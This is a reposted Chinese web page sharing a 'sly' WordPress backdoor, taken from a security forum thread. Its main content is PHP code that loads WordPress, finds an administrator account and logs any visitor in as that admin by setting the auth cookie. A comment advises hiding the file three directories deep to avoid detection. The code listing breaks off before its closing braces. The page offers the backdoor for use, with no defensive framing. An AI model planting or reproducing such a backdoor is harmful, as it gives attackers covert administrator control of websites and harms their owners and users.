猥琐的wordpress后门分享

发布时间:2017-1-25 1:20:45 编辑:www.fx114.net 分享查询网我要评论
本篇文章主要介绍了"猥琐的wordpress后门分享 ",主要涉及到猥琐的wordpress后门分享 方面的内容,对于猥琐的wordpress后门分享 感兴趣的同学可以参考一下。

  https://www.t00ls.net/thread-37312-1-1.html

一个可以自动调用管理员帐号登录wordpress后台的方法。

<?php    require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。    $query_str = "SELECT ID FROM $wpdb->users";    $user_ids = $wpdb->get_results($query_str);    foreach ($user_ids as $uid) {        $user_id = $uid->ID;        if (user_can($user_id, 'administrator')) {            $user_info = get_userdata($user_id);            $user_login = $user_info->user_login;            wp_set_current_user($user_id, $user_login);            wp_set_auth_cookie($user_id);            do_action('wp_login', $user_login);            echo "You are logged in as $user_login";            if (function_exists('get_admin_url')) {                wp_redirect(get_admin_url());            } else {                wp_redirect(get_bloginfo('wpurl') . '/wp-admin');            }

上一篇:MyBatis系列二 之 数据库列名于程序实体类中字段名称不一致
下一篇:Git 总结

相关文章

相关评论